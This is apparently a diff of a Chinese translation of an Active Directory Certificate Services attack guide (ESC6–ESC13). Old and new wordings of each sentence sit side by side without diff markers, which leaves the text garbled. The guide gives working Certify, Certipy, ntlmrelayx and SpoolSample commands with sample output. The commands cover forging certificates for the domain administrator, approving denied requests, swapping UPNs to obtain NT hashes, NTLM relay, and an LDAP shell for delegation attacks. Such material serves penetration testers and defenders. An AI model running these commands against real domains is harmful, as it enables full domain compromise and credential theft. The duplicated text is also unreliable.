[CQure Academy文章](https://cqureacademy.com/blog/enhanced-key-usage)中讨论的主题也涉及到Microsoft概述的**`EDITF_ATTRIBUTESUBJECTALTNAME2`**标志的影响。当在证书颁发机构CA上激活此配置时允许在**任何请求**的**主题备用名称**中包含**用户定义的值**包括那些由Active Directory®构建的请求。因此此配置允许**入侵者**通过为域**认证**设置的**任何模板**进行注册,特别是那些对**非特权用户**开放的用户模板。结果,可以获得一个证书,使入侵者能够作为域管理员或域内的**任何其他活动实体**进行身份验证。
在[**CQure Academy帖子**](https://cqureacademy.com/blog/enhanced-key-usage)中讨论的主题也涉及**`EDITF_ATTRIBUTESUBJECTALTNAME2`**标志的影响,如微软所述。当在证机构CA上激活此配置时允许在**任何请求**的**主题备用名称**中包含**用户定义的值**包括那些由Active Directory®构建的请求。因此这一条款允许**入侵者**通过为域**认证**设置的**任何模板**进行注册——特别是那些对**无特权**用户注册开放的模板,如标准用户模板。结果,证书可以被获取,使入侵者能够作为域管理员或**域内的任何其他活动实体**进行身份验证。
**注意**:通过在`certreq.exe`中使用`-attrib "SAN:"`参数(称为“名称值对”)将**备用名称**附加到证书签名请求CSR与ESC1中对SAN的利用策略形成**对比**。这里的区别在于**帐户信息如何封装**—在证书属性中,而不是在扩展中。
**注意**:通过`certreq.exe`中的`-attrib "SAN:"`参数将**备用名称**附加到证书签名请求CSR的方法称为“名称值对”与ESC1中SAN的利用策略存在**对比**。在这里,区别在于**账户信息的封装方式**——在证书属性中,而不是扩展中。
### 滥用
### Abuse
要验证设置是否已激活,组织可以使用以下命令与`certutil.exe`
要验证设置是否已激活,组织可以使用以下命令与`certutil.exe`
```bash
certutil -config "CA_HOST\CA_NAME" -getreg "policy\EditFlags"
```
这个操作基本上使用了**远程注册表访问**,因此,另一种方法可能是:
此操作本质上使用 **远程注册表访问**,因此,另一种方法可能是:
```bash
reg.exe query \\<CA_SERVER>\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\<CA_NAME>\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy\ /v EditFlags
```
工具如[**Certify**](https://github.com/GhostPack/Certify)和[**Certipy**](https://github.com/ly4k/Certipy)能够检测到这种错误配置并利用它
像 [**Certify**](https://github.com/GhostPack/Certify) 和 [**Certipy**](https://github.com/ly4k/Certipy) 这样的工具能够检测到这种错误配置并加以利用
```bash
# Detect vulnerabilities, including this one
Certify.exe find
@ -216,7 +217,7 @@ Certify.exe find
Certify.exe request /ca:dc.domain.local\theshire-DC-CA /template:User /altname:localadmin
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -template User -upn administrator@corp.local
```
要更改这些设置,假设拥有**域管理员**权限或等权限,可以从任何工作站执行以下命令:
要更改这些设置,假设拥有**域管理员**权限或等权限,可以从任何工作站执行以下命令:
```bash
certutil -config "CA_HOST\CA_NAME" -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2
```
@ -225,8 +226,8 @@ certutil -config "CA_HOST\CA_NAME" -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJ
certutil -config "CA_HOST\CA_NAME" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2
```
{% hint style="warning" %}
2022 年 5 月安全更新之后,新发布的**证书**将包含一个**安全扩展**,其中包含了**请求者的 `objectSid` 属性**。对于 ESC1此 SID 是从指定的 SAN 派生的。然而,对于**ESC6**SID 反映了**请求者的 `objectSid`**,而不是 SAN。\
要利用 ESC6系统必须容易受到 ESC10弱证书映射的影响该映射将**SAN 优先于新的安全扩展**。
2022年5月的安全更新之后新发行的**证书**将包含一个**安全扩展**,该扩展包含**请求者的 `objectSid` 属性**。对于ESC1此SID源自指定的SAN。然而对于**ESC6**SID反映**请求者的 `objectSid`**,而不是SAN。\
要利用ESC6系统必须易受ESC10弱证书映射的影响该漏洞优先考虑**SAN而不是新的安全扩展**。
{% endhint %}
## 易受攻击的证书颁发机构访问控制 - ESC7
@ -235,21 +236,21 @@ certutil -config "CA_HOST\CA_NAME" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJ
#### 解释
证书颁发机构的访问控制通过一组权限来维护,这些权限管理CA 的操作。可以通过访问 `certsrv.msc`,右键单击 CA选择属性然后导航到安全选项卡来查看这些权限。此外可以使用 PSPKI 模块来枚举权限,例如
证书颁发机构的访问控制通过一组权限来维护这些权限管理CA的操作。可以通过访问`certsrv.msc`右键单击CA选择属性然后导航到安全选项卡来查看这些权限。此外可以使用PSPKI模块和以下命令枚举权限
```bash
Get-CertificationAuthority -ComputerName dc.domain.local | Get-CertificationAuthorityAcl | select -expand Access
```
这提供了关于主要权限的见解,即**`ManageCA`**和**`ManageCertificates`**分别对应“CA管理员”和“证书管理员”的角色
这提供了对主要权限的洞察,即 **`ManageCA`** 和 **`ManageCertificates`**分别与“CA管理员”和“证书管理器”的角色相关
#### 滥用
在证书颁发机构拥有**`ManageCA`**权限使主体能够使用PSPKI远程操纵设置。这包括切换**`EDITF_ATTRIBUTESUBJECTALTNAME2`**标志以允许在任何模板中指定SAN这是域提升的关键方面。
在证书颁发机构拥有 **`ManageCA`** 权限使得主体能够使用 PSPKI 远程操控设置。这包括切换 **`EDITF_ATTRIBUTESUBJECTALTNAME2`** 标志,以允许在任何模板中指定 SAN这是域提升的一个关键方面。
通过使用PSPKI的**Enable-PolicyModuleFlag** cmdlet可以简化此过程允许在没有直接GUI交互的情况下进行修改。
通过使用 PSPKI 的 **Enable-PolicyModuleFlag** cmdlet可以简化此过程允许在不直接与 GUI 交互的情况下进行修改。
拥有**`ManageCertificates`**权限可促使批准待处理请求有效地规避“CA证书管理员批准”保障
拥有 **`ManageCertificates`** 权限可以促进对待处理请求的批准有效地绕过“CA 证书管理器批准”保护措施
**Certify**和**PSPKI**模块的组合可用于请求、批准和下载证书:
可以结合 **Certify****PSPKI** 模块来请求、批准和下载证书:
```powershell
# Request a certificate that will require an approval
Certify.exe request /ca:dc.domain.local\theshire-DC-CA /template:ApprovalNeeded
@ -265,34 +266,34 @@ Get-CertificationAuthority -ComputerName dc.domain.local | Get-PendingRequest -R
# Download the certificate
Certify.exe download /ca:dc.domain.local\theshire-DC-CA /id:336
```
### 攻击 2
### Attack 2
#### 解释
#### Explanation
{% hint style="warning" %}
在**上一次攻击**中,使用了**`Manage CA`**权限来启用**EDITF\_ATTRIBUTESUBJECTALTNAME2**标志以执行**ESC6攻击**但在重启CA服务`CertSvc`)之前,这不会产生任何效果。当用户拥有`Manage CA`访问权限时,用户也被允许**重新启动服务**。然而,这**并不意味着用户可以远程重新启动服务**。此外由于2022年5月的安全更新**ESC6在大多数已打补丁的环境中可能无法直接使用**。
在**之前的攻击**中,**`Manage CA`** 权限被用来**启用** **EDITF\_ATTRIBUTESUBJECTALTNAME2** 标志以执行 **ESC6 攻击**,但这在 CA 服务(`CertSvc`)重启之前不会产生任何效果。当用户拥有 `Manage CA` 访问权限时,用户也被允许**重启服务**。然而,这**并不意味着用户可以远程重启服务**。此外,由于 2022 年 5 月的安全更新,**ESC6 可能在大多数已修补的环境中无法正常工作**。
{% endhint %}
因此,这里提出另一种攻击。
因此,这里提出了另一个攻击。
先决条件:
前提条件:
- 仅具有**`ManageCA`权限**
- 具有**`Manage Certificates`**权限(可以从**`ManageCA`**授予)
- 必须**启用**证书模板**`SubCA`**(可以从**`ManageCA`**启用)
* 仅有 **`ManageCA` 权限**
* **`Manage Certificates`** 权限(可以从 **`ManageCA`** 授予)
* 证书模板 **`SubCA`** 必须**启用**(可以从 **`ManageCA`** 启用)
该技术依赖于具有`Manage CA`和`Manage Certificates`访问权限的用户可以**发出失败的证书请求**。**`SubCA`**证书模板**易受ESC1攻击**,但**只有管理员**可以在模板中注册。因此,**用户**可以**请求**注册**`SubCA`** - 将被**拒绝** - 但**然后由管理员签发**。
该技术依赖于拥有 `Manage CA` _和_ `Manage Certificates` 访问权限的用户可以**发出失败的证书请求**。**`SubCA`** 证书模板**易受 ESC1 攻击**,但**只有管理员**可以注册该模板。因此,**用户**可以**请求**注册 **`SubCA`** - 这将被**拒绝** - 但**随后由管理员发放**。
#### 滥用
#### Abuse
您可以通过将您的用户添加为新官员来**授予自己`Manage Certificates`**访问权限。
您可以通过将自己添加为新官员来**授予自己 `Manage Certificates`** 访问权限。
```bash
certipy ca -ca 'corp-DC-CA' -add-officer john -username john@corp.local -password Passw0rd
Certipy v4.0.0 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'John' on 'corp-DC-CA'
```
**`SubCA`** 模板可以使用 `-enable-template` 参数在 CA 上启用。默认情况下,`SubCA` 模板已启用
**`SubCA`** 模板可以通过 `-enable-template` 参数在 CA 上 **启用**。默认情况下,`SubCA` 模板是启用的
```bash
# List templates
certipy ca -username john@corp.local -password Passw0rd! -target-ip ca.corp.local -ca 'corp-CA' -enable-template 'SubCA'
@ -304,9 +305,9 @@ Certipy v4.0.0 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'corp-DC-CA'
```
如果我们已经满足了这次攻击的先决条件,我们可以开始通过**基于`SubCA`模板请求证书**。
如果我们满足了此攻击的先决条件,我们可以开始**请求基于 `SubCA` 模板的证书**。
**这个请求将被拒绝**,但我们会保存私钥并记录请求ID。
**此请求将被拒绝**,但我们将保存私钥并记录请求 ID。
```bash
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -template SubCA -upn administrator@corp.local
Certipy v4.0.0 - by Oliver Lyak (ly4k)
@ -318,7 +319,7 @@ Would you like to save the private key? (y/N) y
[*] Saved private key to 785.key
[-] Failed to request certificate
```
通过我们的 **`Manage CA``Manage Certificates`**然后我们可以使用 `ca` 命令和 `-issue-request <request ID>` 参数**发出失败的证书** 请求。
通过我们的 **`Manage CA``Manage Certificates`**,我们可以使用 `ca` 命令和 `-issue-request <request ID>` 参数 **发放失败的证书** 请求。
```bash
certipy ca -ca 'corp-DC-CA' -issue-request 785 -username john@corp.local -password Passw0rd
Certipy v4.0.0 - by Oliver Lyak (ly4k)
@ -342,23 +343,23 @@ Certipy v4.0.0 - by Oliver Lyak (ly4k)
### 解释
{% hint style="info" %}
安装了**AD CS**的环境中,如果存在一个**易受攻击的 web 登记端点**,并且至少发布了一个允许**域计算机登记和客户端认证**的**证书模板**(例如默认的**`Machine`**模板),那么**任何启用 spooler 服务的计算机都有可能被攻击者入侵**
**安装了AD CS**的环境中,如果存在**易受攻击的Web注册端点**,并且至少有一个**发布的证书模板**允许**域计算机注册和客户端身份验证**(例如默认的**`Machine`**模板),那么**任何具有活动的spooler服务的计算机都可能被攻击者攻陷**
{% endhint %}
AD CS支持几种基于HTTP的登记方法通过管理员安装的附加服务器角色提供。这些用于基于HTTP的证书登记的接口容易受到**NTLM中继攻击**的影响。攻击者可以从**受损的计算机上**冒充通过入站NTLM进行身份验证的**任何AD帐户**。在冒充受害者帐户的同时,攻击者可以访问这些 web 接口,以**请求使用`User`或`Machine`证书模板的客户端认证证书**。
AD CS支持几种**基于HTTP的注册方法**这些方法通过管理员可以安装的额外服务器角色提供。这些用于基于HTTP的证书注册的接口易受**NTLM中继攻击**。攻击者可以从**被攻陷的机器上冒充任何通过入站NTLM进行身份验证的AD账户**。在冒充受害者账户的同时攻击者可以访问这些Web接口以**使用`User`或`Machine`证书模板请求客户端身份验证证书**。
* **web 登记接口**(位于`http://<caserver>/certsrv/`的ASP应用程序默认仅支持HTTP不提供对NTLM中继攻击的保护。此外通过其授权HTTP标头明确允许仅通过NTLM进行身份验证使更安全的身份验证方法如Kerberos无法应用。
* **证书登记服务**CES、**证书登记策略**CEPWeb 服务和**网络设备登记服务**NDES默认支持通过其授权HTTP标头进行协商身份验证。协商身份验证**同时支持**Kerberos和**NTLM**,允许攻击者在中继攻击期间**降级到NTLM**身份验证。尽管这些 web 服务默认启用HTTPS但仅使用HTTPS**无法防范NTLM中继攻击**。对于HTTPS服务防范NTLM中继攻击只有在HTTPS与通道绑定结合时才可能。遗憾的是AD CS没有在IIS上激活扩展保护以进行身份验证,这是通道绑定所需的。
* **Web注册接口**(可在`http://<caserver>/certsrv/`访问的旧ASP应用程序默认仅支持HTTP这并不提供对NTLM中继攻击的保护。此外明确仅允许通过其Authorization HTTP头进行NTLM身份验证使得更安全的身份验证方法如Kerberos不适用。
* **证书注册服务**CES、**证书注册策略**CEPWeb服务和**网络设备注册服务**NDES默认通过其Authorization HTTP头支持协商身份验证。协商身份验证**同时支持**Kerberos和**NTLM**,允许攻击者在中继攻击期间**降级为NTLM**身份验证。尽管这些Web服务默认启用HTTPS但仅靠HTTPS**并不能保护免受NTLM中继攻击**。HTTPS服务的NTLM中继攻击保护只有在HTTPS与通道绑定结合时才能实现。遗憾的是AD CS没有在IIS上启用身份验证的扩展保护,这是通道绑定所需的。
NTLM中继攻击的一个常见**问题**是**NTLM会话的短暂持续时间**以及攻击者无法与**需要NTLM签名**的服务进行交互。
然而,通过利用NTLM中继攻击来获取用户的证书可以克服这一限制,因为证书的有效期决定了会话的持续时间,并且证书可以与**要求NTLM签名**的服务一起使用。有关使用窃取的证书的说明,请参阅
然而,这一限制可以通过利用NTLM中继攻击为用户获取证书来克服,因为证书的有效期决定了会话的持续时间,并且证书可以与**要求NTLM签名**的服务一起使用。有关如何使用被盗证书的说明,请参见
{% content-ref url="account-persistence.md" %}
[account-persistence.md](account-persistence.md)
{% endcontent-ref %}
NTLM中继攻击的另一个限制是**攻击者控制的计算机必须由受害者帐户进行身份验证**。攻击者可以等待或尝试**强制**进行此身份验证:
NTLM中继攻击的另一个限制是**攻击者控制的机器必须由受害者账户进行身份验证**。攻击者可以选择等待或尝试**强制**进行此身份验证:
{% content-ref url="../printers-spooler-service-abuse.md" %}
[printers-spooler-service-abuse.md](../printers-spooler-service-abuse.md)
@ -366,13 +367,13 @@ NTLM中继攻击的另一个限制是**攻击者控制的计算机必须由受
### **滥用**
[**Certify**](https://github.com/GhostPack/Certify)的`cas`列举了**已启用的HTTP AD CS端点**
[**Certify**](https://github.com/GhostPack/Certify)的`cas`枚举**启用的HTTP AD CS端点**
```
Certify.exe cas
```
<figure><img src="../../../.gitbook/assets/image (72).png" alt=""><figcaption></figcaption></figure>
`msPKI-Enrollment-Servers`属性被企业证书颁发机构CAs用来存储证书颁发服务CES端点。可以通过利用工具**Certutil.exe**来解析并列出这些端点:
`msPKI-Enrollment-Servers` 属性被企业证书授权机构 (CAs) 用于存储证书注册服务 (CES) 端点。可以通过利用工具 **Certutil.exe** 解析和列出这些端点:
```
certutil.exe -enrollmentServerURL -config DC01.DOMAIN.LOCAL\DOMAIN-CA
```
@ -383,7 +384,7 @@ Get-CertificationAuthority | select Name,Enroll* | Format-List *
```
<figure><img src="../../../.gitbook/assets/image (940).png" alt=""><figcaption></figcaption></figure>
#### 滥用Certify
#### 利用 Certify
```bash
## In the victim machine
# Prepare to send traffic to the compromised machine 445 port to 445 in the attackers machine
@ -398,11 +399,11 @@ proxychains ntlmrelayx.py -t http://<AC Server IP>/certsrv/certfnsh.asp -smb2sup
# Force authentication from victim to compromised machine with port forwards
execute-assembly C:\SpoolSample\SpoolSample\bin\Debug\SpoolSample.exe <victim> <compromised>
```
#### 利用 [Certipy](https://github.com/ly4k/Certipy)
#### Abuse with [Certipy](https://github.com/ly4k/Certipy)
Certipy默认根据中继的帐户名称是否以`$`结尾来基于`Machine`或`User`模板发出证书请求。可以通过使用`-template`参数来指定替代模板。
默认情况下Certipy 根据模板 `Machine``User` 发出证书请求,这取决于被中继的帐户名称是否以 `$` 结尾。可以通过使用 `-template` 参数来指定替代模板。
然后可以使用类似 [PetitPotam](https://github.com/ly4k/PetitPotam) 的技术来强制进行身份验证。在处理域控制器时,需要指定`-template DomainController`。
然后可以使用 [PetitPotam](https://github.com/ly4k/PetitPotam) 这样的技术来强制身份验证。在处理域控制器时,需要指定 `-template DomainController`
```bash
certipy relay -ca ca.corp.local
Certipy v4.0.0 - by Oliver Lyak (ly4k)
@ -415,44 +416,44 @@ Certipy v4.0.0 - by Oliver Lyak (ly4k)
[*] Saved certificate and private key to 'administrator.pfx'
[*] Exiting...
```
## 无安全扩展 - ESC9 <a href="#id-5485" id="id-5485"></a>
## No Security Extension - ESC9 <a href="#id-5485" id="id-5485"></a>
### 解释
### Explanation
新值 **`CT_FLAG_NO_SECURITY_EXTENSION`** (`0x80000`) 用于 **`msPKI-Enrollment-Flag`** 的 ESC9防止在证书中嵌入 **新的 `szOID_NTDS_CA_SECURITY_EXT` 安全扩展**。当 `StrongCertificateBindingEnforcement` 设置为 `1`(默认设置)时,此标志变得重要,与设置为 `2` 相对。在较弱的证书映射(如 ESC10可能被利用的情况下其重要性在于如果没有 ESC9不会改变要求。
**`CT_FLAG_NO_SECURITY_EXTENSION`** (`0x80000`) 对于 **`msPKI-Enrollment-Flag`**,称为 ESC9防止在证书中嵌入 **新的 `szOID_NTDS_CA_SECURITY_EXT` 安全扩展**。当 `StrongCertificateBindingEnforcement` 设置为 `1`(默认设置)时,该标志变得相关,这与设置为 `2` 相对。在可能被利用的情况下ESC9 的相关性在于较弱的 Kerberos 或 Schannel 证书映射(如 ESC10可能被利用因为缺少 ESC9 不会改变要求。
设置此标志变得重要的条件包括:
该标志设置变得重要的条件包括:
* `StrongCertificateBindingEnforcement` 未调整为 `2`(默认为 `1`),或 `CertificateMappingMethods` `UPN` 标志。
* 证书在 `msPKI-Enrollment-Flag` 设置中标记为带有 `CT_FLAG_NO_SECURITY_EXTENSION` 标志。
* `StrongCertificateBindingEnforcement` 未调整为 `2`(默认为 `1`),或 `CertificateMappingMethods` `UPN` 标志。
* 证书在 `msPKI-Enrollment-Flag` 设置中标记为 `CT_FLAG_NO_SECURITY_EXTENSION` 标志。
* 证书指定了任何客户端身份验证 EKU。
* 可以通过任何帐户获得 `GenericWrite` 权限以妥协另一个帐户。
* 对任何帐户具有 `GenericWrite` 权限以妥协另一个帐户。
### 滥用场景
### Abuse Scenario
假设 `John@corp.local` 拥有对 `Jane@corp.local` `GenericWrite` 权限,目标是妥协 `Administrator@corp.local`。`Jane@corp.local` 被允许注册的 `ESC9` 证书模板在其 `msPKI-Enrollment-Flag` 设置中配置了 `CT_FLAG_NO_SECURITY_EXTENSION` 标志。
假设 `John@corp.local` `Jane@corp.local` 拥有 `GenericWrite` 权限,目标是妥协 `Administrator@corp.local`。`Jane@corp.local` 被允许注册的 `ESC9` 证书模板在其 `msPKI-Enrollment-Flag` 设置中配置了 `CT_FLAG_NO_SECURITY_EXTENSION` 标志。
首先,使用 Shadow 凭据获取 `Jane` 的哈希,感谢 `John``GenericWrite`
最初,使用 Shadow Credentials 获取 `Jane` 的哈希,得益于 `John``GenericWrite`
```bash
certipy shadow auto -username John@corp.local -password Passw0rd! -account Jane
```
随后,`Jane` `userPrincipalName` 被修改为 `Administrator`,故意省略了 `@corp.local` 域部分:
随后,`Jane`的`userPrincipalName`被修改为`Administrator`,故意省略了`@corp.local`域部分:
```bash
certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn Administrator
```
这种修改不违反约束条件,因为 `Administrator@corp.local` 作为 `Administrator``userPrincipalName` 仍然保持不同
此修改不违反约束,因为 `Administrator@corp.local` 仍然作为 `Administrator``userPrincipalName` 而保持独特
随后,请求标记为易受攻击的 `ESC9` 证书模板,请求者`Jane`
接下来,标记为易受攻击的 `ESC9` 证书模板被请求`Jane`
```bash
certipy req -username jane@corp.local -hashes <hash> -ca corp-DC-CA -template ESC9
```
这里注意到证书的 `userPrincipalName` 反映了 `Administrator`,没有任何“object SID”。
注意到证书的 `userPrincipalName` 反映了 `Administrator`,没有任何“对象 SID”。
然后将 `Jane``userPrincipalName` 恢复为她的原始名称 `Jane@corp.local`
`Jane``userPrincipalName` 随后恢复为她的原始值 `Jane@corp.local`
```bash
certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn Jane@corp.local
```
尝试使用颁发的证书进行身份验证现在会产生`Administrator@corp.local`的NT哈希。由于证书缺乏域规范命令必须包括`-domain <domain>`
尝试使用颁发的证书进行身份验证现在会产生 `Administrator@corp.local` NT 哈希。由于证书缺乏域规范,命令必须包括 `-domain <domain>`
```bash
certipy auth -pfx adminitrator.pfx -domain corp.local
```
@ -460,82 +461,82 @@ certipy auth -pfx adminitrator.pfx -domain corp.local
### 解释
域控制器上的两个注册表键值ESC10引用
域控制器上的两个注册表键值ESC10引用
* `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel``CertificateMappingMethods` 的默认值为 `0x18` (`0x8 | 0x10`), 先前设置为 `0x1F`.
* `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc``StrongCertificateBindingEnforcement` 的默认设置为 `1`, 先前为 `0`.
* `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel`下的`CertificateMappingMethods`的默认值为`0x18``0x8 | 0x10`),之前设置为`0x1F`。
* `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc`下的`StrongCertificateBindingEnforcement`的默认设置为`1`,之前为`0`。
**情况1**
**案例 1**
`StrongCertificateBindingEnforcement` 配置为 `0` 时。
当`StrongCertificateBindingEnforcement`配置为`0`时。
**情况2**
**案例 2**
如果 `CertificateMappingMethods` 包括 `UPN` 位 (`0x4`).
如果`CertificateMappingMethods`包含`UPN`位(`0x4`)。
### 滥用案例1
### 滥用案例 1
`StrongCertificateBindingEnforcement` 配置为 `0` 时,具有 `GenericWrite` 权限的帐户A可以被利用来危害任何帐户B。
`StrongCertificateBindingEnforcement`配置为`0`时,具有`GenericWrite`权限的账户A可以被利用来妥协任何账户B。
例如,拥有对 `Jane@corp.local``GenericWrite` 权限,攻击者旨在危害 `Administrator@corp.local`。该过程与ESC9相似允许使用任何证书模板。
例如,拥有对`Jane@corp.local`的`GenericWrite`权限,攻击者旨在妥协`Administrator@corp.local`。该过程与ESC9相似允许使用任何证书模板。
首先使用Shadow凭据利用 `GenericWrite` 获取 `Jane` 的哈希
最初使用Shadow Credentials检索`Jane`的哈希,利用`GenericWrite`
```bash
certipy shadow autho -username John@corp.local -p Passw0rd! -a Jane
```
随后,`Jane` `userPrincipalName` 被更改为 `Administrator`,故意省略`@corp.local` 部分以避免违反约束。
随后,`Jane`的`userPrincipalName`被更改为`Administrator`,故意省略`@corp.local`部分以避免约束冲突
```bash
certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn Administrator
```
以下是以`Jane`身份请求启用客户端认证的证书,使用默认的`User`模板。
接下来,作为 `Jane` 请求一个启用客户端身份验证的证书,使用默认的 `User` 模板。
```bash
certipy req -ca 'corp-DC-CA' -username Jane@corp.local -hashes <hash>
```
`Jane`的`userPrincipalName`然后被恢复为其原始值`Jane@corp.local`。
`Jane`的`userPrincipalName`随后被恢复为其原始值,`Jane@corp.local`。
```bash
certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn Jane@corp.local
```
使用获得的证书进行身份验证将产生`Administrator@corp.local`的NT哈希由于证书中缺少域详细信息需要在命令中指定域。
使用获得的证书进行身份验证将产生 `Administrator@corp.local` NT 哈希,因此由于证书中缺少域详细信息,命令中需要指定域。
```bash
certipy auth -pfx administrator.pfx -domain corp.local
```
### 滥用案例 2
### Abuse Case 2
使用包含 `UPN` 位标志 (`0x4`) 的 `CertificateMappingMethods`,具有 `GenericWrite` 权限的帐户 A 可以 compromise 任何缺少 `userPrincipalName` 属性的帐户 B包括机器帐户和内置域管理员 `Administrator`
`CertificateMappingMethods` 包含 `UPN` 位标志 (`0x4`) 时,具有 `GenericWrite` 权限的账户 A 可以破坏任何缺少 `userPrincipalName` 属性的账户 B包括机器账户和内置域管理员 `Administrator`
在这里,目标是通过 Shadow Credentials 获得 `Jane` 的哈希,利用 `GenericWrite` 来 compromise `DC$@corp.local`。
在这里,目标是破坏 `DC$@corp.local`,首先通过 Shadow Credentials 获取 `Jane` 的哈希,利用 `GenericWrite`。
```bash
certipy shadow auto -username John@corp.local -p Passw0rd! -account Jane
```
`Jane`的`userPrincipalName`然后设置为`DC$@corp.local`。
`Jane`的`userPrincipalName`设置为`DC$@corp.local`。
```bash
certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn 'DC$@corp.local'
```
一个用于客户端认证的证书被请求,使用默认的`User`模板作为`Jane`
请求一个用于客户端身份验证的证书,作为 `Jane` 使用默认的 `User` 模板
```bash
certipy req -ca 'corp-DC-CA' -username Jane@corp.local -hashes <hash>
```
`Jane`的`userPrincipalName`在此过程后恢复为原始值。
`Jane`的`userPrincipalName`在此过程后恢复为原始值。
```bash
certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn 'Jane@corp.local'
```
通过Schannel进行身份验证使用Certipy的`-ldap-shell`选项,指示身份验证成功为`u:CORP\DC$`。
通过 Schannel 进行身份验证,使用 Certipy `-ldap-shell` 选项,身份验证成功的指示 `u:CORP\DC$`
```bash
certipy auth -pfx dc.pfx -dc-ip 172.16.126.128 -ldap-shell
```
通过LDAP shell诸如 `set_rbcd` 的命令可以启用基于资源的受限委派RBCD攻击可能危及域控制器。
通过LDAP shell命令如`set_rbcd`启用基于资源的受限委派RBCD攻击可能危及域控制器。
```bash
certipy auth -pfx dc.pfx -dc-ip 172.16.126.128 -ldap-shell
```
这个漏洞还涉及到任何缺少 `userPrincipalName` 的用户账户,或者其 `userPrincipalName``sAMAccountName` 不匹配的情况,因为默认的 `Administrator@corp.local` 具有较高的 LDAP 权限,并且默认情况下没有 `userPrincipalName`,因此成为主要目标
此漏洞还扩展到任何缺少 `userPrincipalName` 的用户帐户,或其与 `sAMAccountName` 不匹配的帐户,默认的 `Administrator@corp.local` 是一个主要目标,因为它具有提升的 LDAP 权限,并且默认情况下缺少 `userPrincipalName`
## 将 NTLM 中继到 ICPR - ESC11
## Relaying NTLM to ICPR - ESC11
### 解释
### Explanation
如果 CA 服务器未配置 `IF_ENFORCEENCRYPTICERTREQUEST`,则可以通过 RPC 服务进行未签名的 NTLM 中继攻击。[参考链接](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/)。
您可以使用 `certipy` 枚举是否已禁用 `Enforce Encryption for Requests`certipy 将显示 `ESC11` 漏洞。
您可以使用 `certipy` 枚举 `Enforce Encryption for Requests` 是否被禁用certipy 将显示 `ESC11` 漏洞。
```bash
$ certipy find -u mane@domain.local -p 'password' -dc-ip 192.168.100.100 -stdout
Certipy v4.0.0 - by Oliver Lyak (ly4k)
@ -575,27 +576,27 @@ Certipy v4.7.0 - by Oliver Lyak (ly4k)
```
注意:对于域控制器,我们必须在 DomainController 中指定 `-template`
或者使用 [sploutchy 的 impacket 分支](https://github.com/sploutchy/impacket)
或者使用 [sploutchy's fork of impacket](https://github.com/sploutchy/impacket) :
```bash
$ ntlmrelayx.py -t rpc://192.168.100.100 -rpc-mode ICPR -icpr-ca-name DC01-CA -smb2support
```
## 使用YubiHSM访问ADCS CA的Shell访问 - ESC12
## Shell access to ADCS CA with YubiHSM - ESC12
### 解释
### Explanation
管理员可以设置证书颁发机构将其存储在外部设备上,如"Yubico YubiHSM2"
管理员可以设置证书颁发机构将其存储在外部设备上如“Yubico YubiHSM2”
如果USB设备通过USB端口连接到CA服务器或者如果CA服务器是虚拟机则需要一个身份验证密钥有时称为"密码"供密钥存储提供程序生成和使用YubiHSM中的密钥。
如果USB设备通过USB端口连接到CA服务器或者在CA服务器是虚拟机的情况下连接到USB设备服务器则需要一个认证密钥有时称为“密码”以便密钥存储提供程序在YubiHSM中生成和使用密钥。
此密钥/密码以明文形式存储在注册表中`HKEY_LOCAL_MACHINE\SOFTWARE\Yubico\YubiHSM\AuthKeysetPassword`
此密钥/密码以明文形式存储在注册表中,路径为`HKEY_LOCAL_MACHINE\SOFTWARE\Yubico\YubiHSM\AuthKeysetPassword`。
参考 [这里](https://pkiblog.knobloch.info/esc12-shell-access-to-adcs-ca-with-yubihsm)。
参考[这里](https://pkiblog.knobloch.info/esc12-shell-access-to-adcs-ca-with-yubihsm)。
### 滥用场景
### Abuse Scenario
如果CA的私钥存储在物理USB设备上您获得shell访问时就有可能恢复密钥。
如果CA的私钥存储在物理USB设备上你获得shell访问时可以恢复该密钥。
首先,您需要获取CA证书这是公共的),然后:
首先,你需要获取CA证书这是公开的),然后:
```cmd
# import it to the user store with CA certificate
$ certutil -addstore -user my <CA certificate file>
@ -603,17 +604,17 @@ $ certutil -addstore -user my <CA certificate file>
# Associated with the private key in the YubiHSM2 device
$ certutil -csp "YubiHSM Key Storage Provider" -repairstore -user my <CA Common Name>
```
最后,使用`certutil -sign`命令使用CA证书及其私钥伪造一个新的任意证书。
最后,使用 certutil `-sign` 命令利用 CA 证书及其私钥伪造一个新的任意证书。
## OID组链接滥用 - ESC13
## OID 组链接滥用 - ESC13
### 解释
`msPKI-Certificate-Policy`属性允许将签发策略添加到证书模板中。负责签发策略的`msPKI-Enterprise-Oid`对象可以在PKI OID容器的配置命名上下文CN=OID,CN=Public Key Services,CN=Services中找到。可以使用此对象的`msDS-OIDToGroupLink`属性将策略链接到AD组从而使系统能够授权呈现证书的用户就好像他是该组的成员一样。[参考此处](https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53)。
`msPKI-Certificate-Policy` 属性允许将发行政策添加到证书模板中。负责发行政策的 `msPKI-Enterprise-Oid` 对象可以在 PKI OID 容器的配置命名上下文 (CN=OID,CN=Public Key Services,CN=Services) 中发现。可以使用该对象的 `msDS-OIDToGroupLink` 属性将政策链接到 AD 组,从而使系统能够授权一个用户在呈现证书时仿佛他是该组的成员。[此处参考](https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53)。
换句话说,当用户有权限注册证书并且证书链接到OID组时用户可以继承此组的特权
